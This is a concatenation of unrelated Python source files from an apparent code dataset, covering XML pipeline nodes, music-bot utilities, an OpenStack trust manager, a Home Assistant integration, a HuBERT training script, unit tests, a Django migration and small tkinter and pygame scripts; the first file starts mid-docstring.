    A FileReader that parses an XML file and yields lxml.etree Element objects matching
    the given XPath expression.
    '''
    # XPath expression selecting the elements to yield (required).
    xpath = Option(str, required=True)
    def read(self, file):
        # Parse the whole document once, then emit each match in turn.
        root = lxml.etree.parse(file)
        for e in root.xpath(self.xpath):
            yield e
    __call__ = read
class CurriedXMLReader(Configurable):
    '''
    Similar to XMLReader, this reader takes XML filenames as input, and for each parses
    the XML content and yields lxml.etree Element objects matching the given XPath
    expression.
    '''
    xpath = Option(str, required=True)
    fs = Service(
        'fs',
        __doc__='''The filesystem instance to use.''',
    )  # type: str
    mode = Option(
        str,
        default='r',
        __doc__='''What mode to use for open() call.''',
    )  # type: str
    encoding = Option(
        str,
        default='utf-8',
        __doc__='''Encoding.''',
    )  # type: str
    limit = Option(
        int,
        __doc__='''Limit the number of rows read (to allow early pipeline termination).''',
    )
    verbose = Option(
        bool,
        default=False
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Running total of elements yielded across all files read so far;
        # compared against `limit` for early termination.
        self.count = 0
    def read(self, path, *, fs):
        """Parse the XML file at `path` and yield elements matching `xpath`.

        Stops once `limit` elements have been produced in total across
        calls; when the limit is already reached the file is not opened.
        """
        limit = self.limit
        count = self.count
        if limit and count >= limit:
            return
        if self.verbose:
            sys.stderr.write('============================== %s\n' % (path,))
        file = fs.open(path, self.mode, encoding=self.encoding)
        # BUG FIX: the original only reached file.close() on a clean pass
        # through the loop; an exception from lxml or from the consumer
        # leaked the handle. try/finally closes it on every exit path.
        try:
            root = lxml.etree.parse(file)
            for e in root.xpath(self.xpath):
                if limit and count >= limit:
                    break
                count += 1
                yield e
            self.count = count
        finally:
            file.close()
    __call__ = read
class ExtractXPath(Configurable):
    '''Transformation node: apply `xpath` to each incoming element and
    yield every match.'''
    xpath = Option(str, required=True)
    def __call__(self, e):
        for a in e.xpath(self.xpath):
            yield a
class FilterXPathEqual(Configurable):
    '''Filter node: pass the element through unchanged when any node matched
    by `xpath` has text equal to `value`; drop it otherwise.'''
    xpath = Option(str, required=True)
    value = Option(str)
    def __call__(self, e):
        for t in e.xpath(self.xpath):
            if t.text == self.value:
                # tell bonobo to forward the input unchanged
                return NOT_MODIFIED
        return None
def print_xml_element(e):
    # Debug node: dump the element's serialized XML on a single line,
    # then pass the element through unchanged.
    s = lxml.etree.tostring(e).decode('utf-8')
    print(s.replace('\n', ' '))
    return NOT_MODIFIED
def print_xml_element_text(e):
    # Debug node: print the element's text content, pass it through unchanged.
    print(e.text)
    return NOT_MODIFIED
| 2,289 | 881 |
#
# Copyright (C) 2021-2022 by TeamYukki@Github, < https://github.com/TeamYukki >.
#
# This file is part of < https://github.com/TeamYukki/YukkiMusicBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamYukki/YukkiMusicBot/blob/master/LICENSE >
#
# All rights reserved.
from typing import Union
from pyrogram.types import Message
def get_readable_time(seconds: int) -> str:
    """Render a duration in seconds as a compact human-readable string.

    Examples: 30 -> "30s", 3661 -> "1h:1m:1s", 90061 -> "1days, 1h:1m:1s".
    A zero-length duration yields the empty string.
    """
    suffixes = ("s", "m", "h", "days")
    parts = []
    for position in range(4):
        if seconds == 0:
            # nothing left to decompose; stop before emitting a zero field
            break
        # seconds and minutes roll over at 60, hours at 24
        base = 60 if position < 2 else 24
        seconds, value = divmod(seconds, base)
        parts.append("{}{}".format(value, suffixes[position]))
    if not parts:
        return ""
    readable = ""
    if len(parts) == 4:
        # the days field is set apart with a comma
        readable += parts.pop() + ", "
    parts.reverse()
    readable += ":".join(parts)
    return readable
def convert_bytes(size: float) -> str:
    """Humanize a byte count, e.g. 2048 -> '2.00 KiB'; falsy input -> ''."""
    if not size:
        return ""
    step = 1024
    prefixes = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
    magnitude = 0
    value = size
    while value > step:
        value /= step
        magnitude += 1
    return "{:.2f} {}B".format(value, prefixes[magnitude])
async def int_to_alpha(user_id: int) -> str:
    """Encode each decimal digit of `user_id` as a letter a-j (0 -> 'a')."""
    digit_to_letter = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
    return "".join(digit_to_letter[int(ch)] for ch in str(user_id))
async def alpha_to_int(user_id_alphabet: str) -> int:
    """Inverse of int_to_alpha: map letters a-j back to the original int."""
    letters = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
    digits = "".join(str(letters.index(ch)) for ch in user_id_alphabet)
    return int(digits)
def time_to_seconds(time):
    """Convert an "HH:MM:SS"-style value (any number of ':' fields) to seconds."""
    total = 0
    # Horner evaluation: each ':' field is worth 60x the one to its right.
    for field in str(time).split(":"):
        total = total * 60 + int(field)
    return total
def seconds_to_min(seconds):
    """Format a duration as [DD:][HH:]MM:SS, trimming leading zero fields.

    Returns "-" for None or a zero-length duration.
    """
    if seconds is None:
        return "-"
    total = int(seconds)
    days, remainder = divmod(total, 3600 * 24)
    hours, remainder = divmod(remainder, 3600)
    minutes, secs = divmod(remainder, 60)
    if days > 0:
        return "{:02d}:{:02d}:{:02d}:{:02d}".format(days, hours, minutes, secs)
    if hours > 0:
        return "{:02d}:{:02d}:{:02d}".format(hours, minutes, secs)
    if minutes > 0:
        return "{:02d}:{:02d}".format(minutes, secs)
    if secs > 0:
        return "00:{:02d}".format(secs)
    return "-"
# Recognised video container / file extensions, used to classify media files.
# NOTE(review): "flv" and "m4v" appear twice -- harmless but redundant.
formats = [
    "webm",
    "mkv",
    "flv",
    "vob",
    "ogv",
    "ogg",
    "rrc",
    "gifv",
    "mng",
    "mov",
    "avi",
    "qt",
    "wmv",
    "yuv",
    "rm",
    "asf",
    "amv",
    "mp4",
    "m4p",
    "m4v",
    "mpg",
    "mp2",
    "mpeg",
    "mpe",
    "mpv",
    "m4v",
    "svi",
    "3gp",
    "3g2",
    "mxf",
    "roq",
    "nsv",
    "flv",
    "f4v",
    "f4p",
    "f4a",
    "f4b",
]
| 3,063 | 1,270 |
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1TypedLocalObjectReferenceDict generated type."""
from typing import TypedDict
# NOTE(review): generated code -- regenerate with `typeddictgen` rather than
# editing by hand. total=False makes every key optional.
V1TypedLocalObjectReferenceDict = TypedDict(
    "V1TypedLocalObjectReferenceDict",
    {
        "apiGroup": str,
        "kind": str,
        "name": str,
    },
    total=False,
)
| 316 | 101 |
from .context import GlobalContext
from .dao import BaseDao
from .model import BaseModel
from .service import BaseService
from .schema import BaseSchema, DeleteSchema, DeleteResponseSchema, ListSchema
from .crud import BaseCrud
from .message_generator import get_message
| 271 | 67 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from karbor.common import karbor_keystone_plugin
LOG = logging.getLogger(__name__)
class UserTrustManager(object):
    """Caches Keystone trusts and trust sessions per (user, project) pair.

    A trust is created the first time an operation is registered for a
    user/project pair and deleted again once the last operation for that
    pair is removed.  The cache is a plain in-memory dict; callers are
    assumed to serialize access (no locking here).
    """

    def __init__(self):
        super(UserTrustManager, self).__init__()
        # key (see _user_trust_key) -> {'operation_ids', 'trust_id', 'session'}
        self._user_trust_map = {}
        self._skp = karbor_keystone_plugin.KarborKeystonePlugin()

    def _user_trust_key(self, user_id, project_id):
        """Return the cache key for a user/project pair."""
        return "%s_%s" % (user_id, project_id)

    def _add_user_trust_info(self, user_id, project_id,
                             operation_id, trust_id, session):
        """Create a cache entry tracking one operation for the pair."""
        key = self._user_trust_key(user_id, project_id)
        self._user_trust_map[key] = {
            'operation_ids': {operation_id},
            'trust_id': trust_id,
            'session': session
        }

    def _get_user_trust_info(self, user_id, project_id):
        """Return the cached entry for the pair, or None."""
        return self._user_trust_map.get(
            self._user_trust_key(user_id, project_id))

    def _del_user_trust_info(self, user_id, project_id):
        """Drop the cached entry for the pair if present."""
        # pop() with a default instead of del so a repeated delete cannot
        # raise KeyError.
        self._user_trust_map.pop(
            self._user_trust_key(user_id, project_id), None)

    def get_token(self, user_id, project_id):
        """Return a token from the cached trust session, or None on failure."""
        auth_info = self._get_user_trust_info(user_id, project_id)
        if not auth_info:
            return None
        try:
            return auth_info['session'].get_token()
        except Exception:
            LOG.exception("Get token failed, user_id=%(user_id)s, "
                          "project_id=%(proj_id)s",
                          {'user_id': user_id, 'proj_id': project_id})
        return None

    def add_operation(self, context, operation_id):
        """Register an operation, creating a trust on first use.

        Returns the trust id for the user/project pair of *context*.
        """
        auth_info = self._get_user_trust_info(
            context.user_id, context.project_id)
        if auth_info:
            auth_info['operation_ids'].add(operation_id)
            return auth_info['trust_id']
        trust_id = self._skp.create_trust_to_karbor(context)
        try:
            lsession = self._skp.create_trust_session(trust_id)
        except Exception:
            # Roll back the freshly created trust if no session can be
            # opened for it.
            self._skp.delete_trust_to_karbor(trust_id)
            raise
        self._add_user_trust_info(context.user_id, context.project_id,
                                  operation_id, trust_id, lsession)
        return trust_id

    def delete_operation(self, context, operation_id):
        """Unregister an operation; delete the trust when none remain."""
        auth_info = self._get_user_trust_info(
            context.user_id, context.project_id)
        if not auth_info:
            return
        operation_ids = auth_info['operation_ids']
        operation_ids.discard(operation_id)
        if not operation_ids:
            self._skp.delete_trust_to_karbor(auth_info['trust_id'])
            self._del_user_trust_info(context.user_id, context.project_id)

    def resume_operation(self, operation_id, user_id, project_id, trust_id):
        """Re-attach an operation to an existing trust (e.g. after restart)."""
        auth_info = self._get_user_trust_info(user_id, project_id)
        if auth_info:
            auth_info['operation_ids'].add(operation_id)
            return
        # Unlike add_operation() there is no rollback here: the trust was
        # created earlier and must survive a failed session creation.
        # (The original wrapped this in a try/except that only re-raised.)
        lsession = self._skp.create_trust_session(trust_id)
        self._add_user_trust_info(user_id, project_id,
                                  operation_id, trust_id, lsession)
| 3,742 | 1,184 |
"""The Philips Hue Play HDMI Sync Box integration."""
import asyncio
import logging
import json
import os
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers import (config_validation as cv)
from homeassistant.helpers.config_validation import make_entity_service_schema
from homeassistant.helpers.service import async_extract_entity_ids
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from .huesyncbox import HueSyncBox, async_remove_entry_from_huesyncbox
from .const import DOMAIN, LOGGER, ATTR_SYNC, ATTR_SYNC_TOGGLE, ATTR_MODE, ATTR_MODE_NEXT, ATTR_MODE_PREV, MODES, ATTR_INTENSITY, ATTR_INTENSITY_NEXT, ATTR_INTENSITY_PREV, INTENSITIES, ATTR_INPUT, ATTR_INPUT_NEXT, ATTR_INPUT_PREV, INPUTS, ATTR_ENTERTAINMENT_AREA, SERVICE_SET_SYNC_STATE, SERVICE_SET_BRIGHTNESS, SERVICE_SET_MODE, SERVICE_SET_INTENSITY, SERVICE_SET_ENTERTAINMENT_AREA
# No YAML configuration is supported; entries come from the config flow.
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
# Entity platforms forwarded for every config entry.
PLATFORMS = ["media_player"]
# Combined state service: every key is optional so any subset of the box
# state can be changed in a single call.
HUESYNCBOX_SET_STATE_SCHEMA = make_entity_service_schema(
    {
        vol.Optional(ATTR_SYNC): cv.boolean,
        vol.Optional(ATTR_SYNC_TOGGLE): cv.boolean,
        # NOTE(review): cv.small_float presumably restricts to 0..1 — verify.
        vol.Optional(ATTR_BRIGHTNESS): cv.small_float,
        # Step may be negative to dim.
        vol.Optional(ATTR_BRIGHTNESS_STEP): vol.All(vol.Coerce(float), vol.Range(min=-1, max=1)),
        vol.Optional(ATTR_MODE): vol.In(MODES),
        vol.Optional(ATTR_MODE_NEXT): cv.boolean,
        vol.Optional(ATTR_MODE_PREV): cv.boolean,
        vol.Optional(ATTR_INTENSITY): vol.In(INTENSITIES),
        vol.Optional(ATTR_INTENSITY_NEXT): cv.boolean,
        vol.Optional(ATTR_INTENSITY_PREV): cv.boolean,
        vol.Optional(ATTR_INPUT): vol.In(INPUTS),
        vol.Optional(ATTR_INPUT_NEXT): cv.boolean,
        vol.Optional(ATTR_INPUT_PREV): cv.boolean,
        vol.Optional(ATTR_ENTERTAINMENT_AREA): cv.string,
    }
)
# Single-purpose service schemas.
HUESYNCBOX_SET_BRIGHTNESS_SCHEMA = make_entity_service_schema(
    {vol.Required(ATTR_BRIGHTNESS): cv.small_float}
)
HUESYNCBOX_SET_MODE_SCHEMA = make_entity_service_schema(
    {vol.Required(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_INTENSITY_SCHEMA = make_entity_service_schema(
    {vol.Required(ATTR_INTENSITY): vol.In(INTENSITIES), vol.Optional(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA = make_entity_service_schema(
    {vol.Required(ATTR_ENTERTAINMENT_AREA): cv.string}
)
# Module-level flag: services are shared and registered only once.
services_registered = False
async def async_setup(hass: HomeAssistant, config: dict):
    """Set up the Philips Hue Play HDMI Sync Box integration.

    Discovery is zeroconf/config-entry based, so the only work here is
    preparing the integration's storage area in ``hass.data``.
    """
    hass.data[DOMAIN] = {}
    return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Set up a config entry for Philips Hue Play HDMI Sync Box.

    Creates the HueSyncBox wrapper, forwards the entry to the entity
    platforms and registers the shared services on the first entry.
    """
    # Lazy %-style args: the message is only formatted when debug logging
    # is actually enabled (the original pre-formatted with `%`).
    LOGGER.debug(
        "%s async_setup_entry\nentry:\n%s\nhass.data\n%s",
        __name__, entry, hass.data[DOMAIN],
    )
    huesyncbox = HueSyncBox(hass, entry)
    hass.data[DOMAIN][entry.data["unique_id"]] = huesyncbox

    if not await huesyncbox.async_setup():
        return False

    for platform in PLATFORMS:
        hass.async_create_task(
            hass.config_entries.async_forward_entry_setup(entry, platform)
        )

    # Register services on first entry
    global services_registered
    if not services_registered:
        await async_register_services(hass)
        services_registered = True
    return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Unload a config entry and its entity platforms.

    Returns True when every platform unloaded cleanly; in that case the
    box wrapper is reset and, when this was the last entry, the shared
    services are unregistered.
    """
    unload_ok = all(
        await asyncio.gather(
            *[
                hass.config_entries.async_forward_entry_unload(entry, platform)
                for platform in PLATFORMS
            ]
        )
    )
    if unload_ok:
        huesyncbox = hass.data[DOMAIN].pop(entry.data["unique_id"])
        await huesyncbox.async_reset()
        # Unregister services when the last entry is unloaded.
        # (An empty dict is falsy — no need for len(d.items()) == 0.)
        if not hass.data[DOMAIN]:
            await async_unregister_services(hass)
            global services_registered
            services_registered = False
    return unload_ok
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
    """Best-effort cleanup when the entry is removed entirely.

    The user might not even have the device anymore, or had it factory
    reset, so a failure is only logged.  The entry itself has already
    been unloaded at this point.
    """
    try:
        await async_remove_entry_from_huesyncbox(entry)
    except Exception as err:
        LOGGER.warning("Unregistering Philips Hue Play HDMI Sync Box failed: %s ", err)
async def async_register_services(hass: HomeAssistant):
    """Register the integration's entity services.

    Every handler follows the same pattern — resolve the targeted
    huesyncbox entities and call one entity method — so the dispatch is
    factored into a single helper instead of five copy-pasted loops.
    """

    async def _matching_entities(call):
        """Yield the huesyncbox entities targeted by *call*."""
        entity_ids = await async_extract_entity_ids(hass, call)
        # .values(): the unique_id keys are not needed here.
        for entry in hass.data[DOMAIN].values():
            if entry.entity and entry.entity.entity_id in entity_ids:
                yield entry.entity

    async def async_set_sync_state(call):
        async for entity in _matching_entities(call):
            await entity.async_set_sync_state(call.data)

    hass.services.async_register(
        DOMAIN, SERVICE_SET_SYNC_STATE, async_set_sync_state, schema=HUESYNCBOX_SET_STATE_SCHEMA
    )

    async def async_set_sync_mode(call):
        async for entity in _matching_entities(call):
            await entity.async_set_sync_mode(call.data.get(ATTR_MODE))

    hass.services.async_register(
        DOMAIN, SERVICE_SET_MODE, async_set_sync_mode, schema=HUESYNCBOX_SET_MODE_SCHEMA
    )

    async def async_set_intensity(call):
        async for entity in _matching_entities(call):
            await entity.async_set_intensity(call.data.get(ATTR_INTENSITY), call.data.get(ATTR_MODE, None))

    hass.services.async_register(
        DOMAIN, SERVICE_SET_INTENSITY, async_set_intensity, schema=HUESYNCBOX_SET_INTENSITY_SCHEMA
    )

    async def async_set_brightness(call):
        async for entity in _matching_entities(call):
            await entity.async_set_brightness(call.data.get(ATTR_BRIGHTNESS))

    hass.services.async_register(
        DOMAIN, SERVICE_SET_BRIGHTNESS, async_set_brightness, schema=HUESYNCBOX_SET_BRIGHTNESS_SCHEMA
    )

    async def async_set_entertainment_area(call):
        async for entity in _matching_entities(call):
            await entity.async_select_entertainment_area(call.data.get(ATTR_ENTERTAINMENT_AREA))

    hass.services.async_register(
        DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA, async_set_entertainment_area, schema=HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA
    )
async def async_unregister_services(hass):
    """Remove every service registered by async_register_services()."""
    for service in (
        SERVICE_SET_SYNC_STATE,
        SERVICE_SET_BRIGHTNESS,
        SERVICE_SET_MODE,
        SERVICE_SET_INTENSITY,
        SERVICE_SET_ENTERTAINMENT_AREA,
    ):
        hass.services.async_remove(DOMAIN, service)
| 7,309 | 2,566 |
#!/usr/bin/env python3
"""Train the HuBERTPretrainModel by using labels generated by KMeans clustering.
Example:
python train.py --root-path ./exp/data/mfcc/ --feature-type mfcc --num-classes 100
"""
import logging
import pathlib
from argparse import (
ArgumentDefaultsHelpFormatter,
ArgumentParser,
RawDescriptionHelpFormatter,
)
from typing import Optional, Tuple
from lightning import HuBERTPreTrainModule
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
logger = logging.getLogger(__name__)
class _Formatter(ArgumentDefaultsHelpFormatter, RawDescriptionHelpFormatter):
# To use ArgumentDefaultsHelpFormatter as the formatter_class and
# RawDescriptionHelpFormatter to add custom formatting to description or epilog.
# Check: https://stackoverflow.com/a/18462760
pass
def run_train(args):
    """Assemble callbacks, trainer and lightning module, then start training."""
    checkpoint_dir = args.exp_dir / f"checkpoints_{args.dataset}_{args.model_name}"

    # Keep the five best checkpoints by validation loss and by train loss.
    callbacks = [
        ModelCheckpoint(
            checkpoint_dir,
            monitor=metric,
            mode="min",
            save_top_k=5,
            save_weights_only=False,
            verbose=True,
        )
        for metric in ("Losses/val_loss", "Losses/train_loss")
    ]

    trainer = Trainer(
        default_root_dir=args.exp_dir,
        max_steps=args.max_updates,
        num_nodes=args.num_nodes,
        gpus=args.gpus,
        accelerator="gpu",
        strategy="ddp",
        replace_sampler_ddp=False,
        gradient_clip_val=args.clip_norm,
        callbacks=callbacks,
        reload_dataloaders_every_n_epochs=1,
    )
    module = HuBERTPreTrainModule(
        model_name=args.model_name,
        feature_grad_mult=args.feature_grad_mult,
        num_classes=args.num_classes,
        dataset=args.dataset,
        root_path=args.root_path,
        feature_type=args.feature_type,
        seconds_per_batch=args.seconds_per_batch,
        learning_rate=args.learning_rate,
        betas=args.betas,
        eps=args.eps,
        weight_decay=args.weight_decay,
        warmup_updates=args.warmup_updates,
        max_updates=args.max_updates,
    )
    trainer.fit(module, ckpt_path=args.resume_checkpoint)
def _parse_args():
parser = ArgumentParser(
description=__doc__,
formatter_class=_Formatter,
)
parser.add_argument(
"--root-path",
type=pathlib.Path,
required=True,
help="Path to the feature and label directories.",
)
parser.add_argument(
"--resume-checkpoint",
type=Optional[pathlib.Path],
default=None,
help="Path to the feature and label directories. (Default: None)",
)
parser.add_argument(
"--feature-type",
choices=["mfcc", "hubert"],
type=str,
required=True,
)
parser.add_argument(
"--feature-grad-mult",
default=0.1,
type=float,
help="The scaling factor to multiply the feature extractor gradient. (Default: 0.1)",
)
parser.add_argument(
"--num-classes",
choices=[100, 500],
type=int,
required=True,
help="The ``num_class`` when building the hubert_pretrain_base model.",
)
parser.add_argument(
"--model-name",
default="hubert_pretrain_base",
choices=["hubert_pretrain_base", "hubert_pretrain_large", "hubert_pretrain_xlarge"],
type=str,
help="The HuBERT model to train. (Default: 'hubert_pretrain_base')",
)
parser.add_argument(
"--exp-dir",
default=pathlib.Path("./exp"),
type=pathlib.Path,
help="Directory to save checkpoints and logs to. (Default: './exp')",
)
parser.add_argument(
"--dataset",
default="librispeech",
choices=["librispeech", "librilight"],
type=str,
help="The dataset for training. (Default: 'librispeech')",
)
parser.add_argument(
"--learning-rate",
default=0.0005,
type=float,
help="The peak learning rate. (Default: 0.0005)",
)
parser.add_argument(
"--betas",
default=(0.9, 0.98),
type=Tuple,
help="The coefficients for computing running averages of gradient and its square (Default: (0.9, 0.98))",
)
parser.add_argument(
"--eps",
default=1e-6,
type=float,
help="Epsilon value in Adam optimizer. (Default: 1e-6)",
)
parser.add_argument(
"--weight-decay",
default=0.01,
type=float,
help="Weight decay (L2 penalty) (default: 0.01)",
)
parser.add_argument(
"--clip-norm",
default=None,
type=Optional[float],
help="The gradient norm value to clip. (Default: None)",
)
parser.add_argument(
"--num-nodes",
default=4,
type=int,
help="Number of nodes to use for training. (Default: 4)",
)
parser.add_argument(
"--gpus",
default=8,
type=int,
help="Number of GPUs per node to use for training. (Default: 8)",
)
parser.add_argument(
"--warmup-updates",
default=32000,
type=int,
help="Number of steps for warm up the learning rate. (Default: 32000)",
)
parser.add_argument(
"--max-updates",
default=250000,
type=int,
help="Total number of training steps. (Default: 250000)",
)
parser.add_argument(
"--seconds-per-batch",
default=87.5,
type=float,
help="Number of seconds of audio in a mini-batch. (Default: 87.5)",
)
parser.add_argument("--debug", action="store_true", help="whether to use debug level for logging")
return parser.parse_args()
def _init_logger(debug):
fmt = "%(asctime)s %(message)s" if debug else "%(message)s"
level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(format=fmt, level=level, datefmt="%Y-%m-%d %H:%M:%S")
def cli_main():
    """Entry point: parse arguments, set up logging and launch training."""
    parsed = _parse_args()
    _init_logger(parsed.debug)
    run_train(parsed)


if __name__ == "__main__":
    cli_main()
| 6,278 | 2,033 |
import torch
def proxyless_nas_mobile(args):
    """Load ProxylessNAS-Mobile from torch.hub.

    Args:
        args: Namespace with a boolean ``pretrained`` attribute.

    Returns:
        The ProxylessNAS-Mobile model, with ImageNet weights when
        ``args.pretrained`` is truthy.
    """
    # proxyless_gpu, proxyless_mobile, proxyless_mobile14 are also avaliable.
    target_platform = "proxyless_mobile"
    # Single hub call: the two original branches differed only in the
    # pretrained flag.
    model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform,
                           pretrained=bool(args.pretrained))
    if args.pretrained:
        print("ImageNet pretrained ProxylessNAS-Mobile loaded! (Pretrained Top-1 Acc: 74.59%)")
    return model
| 495 | 172 |
'''
Created on 22 Dec 2019
@author: ody
'''
import unittest
from utils.Assrt import Eq, AssertErr, XdArrParser
class Test(unittest.TestCase):
    """Tests for Eq.int2dArr and XdArrParser.

    The original repeated a try/self.fail/except block nine times; that
    pattern is exactly what assertRaises expresses, so the cases are now
    table-driven.
    """

    def testArrEq(self):
        """Mismatched 2-d arrays must raise AssertErr; matches must not."""
        eq = Eq()
        # Each pair differs in shape or content and must be rejected.
        bad_pairs = [
            ([[]], [[1]]),
            ([[]], []),
            ([[1]], [[]]),
            ([[2]], [[1]]),
            ([[2], [1]], [[1], [3]]),
            ([[1]], [[1, 2]]),
            ([[1, 2], [2, 1], [1, 3, 5]], [[2, 1], [1, 2], [3, 1, 6]]),
            ([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6]]),
            ([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6], [1]]),
        ]
        for lhs, rhs in bad_pairs:
            with self.assertRaises(AssertErr):
                eq.int2dArr(lhs, rhs)
        # Equal arrays must pass (element order inside a row is ignored).
        eq.int2dArr([], [])
        eq.int2dArr([[]], [[]])
        eq.int2dArr([[1, 2]], [[2, 1]])
        eq.int2dArr([[1, 2], [2, 1]], [[2, 1], [1, 2]])
        eq.int2dArr([[1, 2], [2, 1], [1, 3, 4]], [[2, 1], [1, 2], [3, 1, 4]])

    def testPasrsArr(self):
        """XdArrParser(2) parses 2-d int arrays matching the expected values."""
        eq = Eq()
        parse2d = XdArrParser(2)
        cases = [
            ("[[1,2],[3]]", [[1, 2], [3]]),
            ("[[1],[3]]", [[1], [3]]),
            ("[[1],[3,1]]", [[1], [3, 1]]),
            ("[[1],[3,1]]", [[1], [1, 3]]),
            ("[[1,3],[3,1]]", [[1, 3], [1, 3]]),
            ("[[1,3],[]]", [[1, 3], []]),
            ("[[],[]]", [[], []]),
            ("[[1],[2], [3]]", [[1], [2], [3]]),
            ("[[1], [2, 3, 4, 5, 6, 7], [3]]", [[1], [3], [2, 3, 4, 5, 6, 7]]),
            ("[[1], [2, 3, 4, 5, 6, 7], [10, 12]]", [[1], [10, 12], [2, 3, 4, 5, 6, 7]]),
        ]
        for text, expected in cases:
            eq.int2dArr(expected, parse2d.parseInt(text))

    def testParse3d(self):
        """XdArrParser(3) parses a 3-d array; check its single 2-d slice."""
        eq = Eq()
        parse3d = XdArrParser(3)
        a3d = parse3d.parseInt("[[[1],[3,1]]]")
        eq.int2dArr([[1], [1, 3]], a3d[0])
class TestFile(unittest.TestCase):
    # NOTE(review): presumably each case file stores 2-d array pairs that
    # Eq.int2dArrFile loads and compares — verify against utils.Assrt.
    def testAssertFile(self):
        """Run the data-file driven 2-d array comparisons."""
        eq = Eq()
        eq.int2dArrFile('data/case01.txt', 2)
        eq.int2dArrFile('data/case02.txt', 2)
        eq.int2dArrFile('data/case03.txt', 2)
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    # Standard unittest entry point: discover and run all cases above.
    unittest.main()
# Generated by Django 4.0.3 on 2022-05-03 21:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Reshape the restaurant model: drop scheduling fields, add
    address/contact fields, and tighten the feature relation."""

    dependencies = [
        ('home', '0016_rename_restaurantfeatures_restaurantfeature'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='restaurant',
            name='date',
        ),
        migrations.RemoveField(
            model_name='restaurant',
            name='start_time',
        ),
        migrations.AddField(
            model_name='restaurant',
            name='city',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AddField(
            model_name='restaurant',
            name='contact',
            # NOTE(review): max_length has no effect on BigIntegerField
            # (it is only honored by char-based fields) — consider removing
            # it from the model and regenerating this migration.
            field=models.BigIntegerField(blank=True, max_length=10, null=True),
        ),
        migrations.AddField(
            model_name='restaurant',
            name='pincode',
            # NOTE(review): same as above — max_length is ignored on
            # IntegerField.
            field=models.IntegerField(blank=True, max_length=6, null=True),
        ),
        migrations.AddField(
            model_name='restaurant',
            name='state',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='restaurantfeature',
            name='restaurant',
            # One feature row per restaurant, reachable as restaurant.features.
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='features', to='home.restaurant'),
        ),
    ]
| 1,474 | 444 |
from tkinter import *
# Root window of the menu screen.
window = Tk()

def open_menu_window():
    # Placeholder: menu-opening behavior is not implemented yet, and this
    # function is not referenced anywhere in the visible script.
    pass

# Window configs
window.title("Azzy001 : Menu Window")
window.geometry("440x520")
# Fixed-size window, kept on top of other windows.
window.resizable(0, 0)
window.attributes("-topmost", True)
window.mainloop()
def anagram(s1, s2):
result = False #set your base
if len(s1) == len(s2): #can't be anagrams if diff length
count = 0 #used to check for matches
i = 0
while i < len(s1): #'outer loop' for s1
j = 0
while j < len(s2): #'inner loop' to check every s2 letter for each s1 letter
if s1[i:i+1] == s2[j:j+1]: #if theres a match
count += 1 #++ count
j += 1
i += 1
if count == len(s1): #if count == s1len then it means they must have the exact same letters
result = True
return result
anagram("jack","kabj")
| 701 | 221 |
from pygame import *
# Play-field dimensions in pixels.
win_width=600
win_height=500
class GameSprite(sprite.Sprite):
    # Base sprite: loads an image, scales it and tracks position/speed.
    def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed ):
        super().__init__()
        # Load the picture and scale it to the requested size.
        self.image = transform.scale(image.load(player_image), (size_x, size_y))
        self.speed = player_speed
        # rect drives both drawing position and collision detection.
        self.rect = self.image.get_rect()
        self.rect.x = player_x
        self.rect.y = player_y
    def reset(self):
        # Redraw the sprite at its current position.
        window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
    """Keyboard-controlled paddle.

    updatel() uses W/S (left paddle), updater() the arrow keys (right
    paddle); both share the same movement/clamping logic, which the
    original duplicated verbatim.
    """
    def _move(self, up_key, down_key):
        # Clamp to the vertical play area: 5 px from the top and 80 px
        # (the paddle height) from the bottom of the window.
        keys = key.get_pressed()
        if keys[up_key] and self.rect.y > 5:
            self.rect.y -= self.speed
        if keys[down_key] and self.rect.y < win_height - 80:
            self.rect.y += self.speed
    def updatel(self):
        self._move(K_w, K_s)
    def updater(self):
        self._move(K_UP, K_DOWN)
# Background color (light cyan) and main window.
back=(200, 255, 255)
window=display.set_mode((win_width, win_height))
window.fill(back)
# Left paddle, right paddle and the ball.
p_l= Player('racket.png', 30, 200, 10, 80, 10)
p_r= Player('racket.png', 520, 200, 10, 80, 10)
ball=GameSprite('tenis_ball.png', 200, 200, 30, 30, 70)
font.init()
font = font.SysFont("Areal", 35)
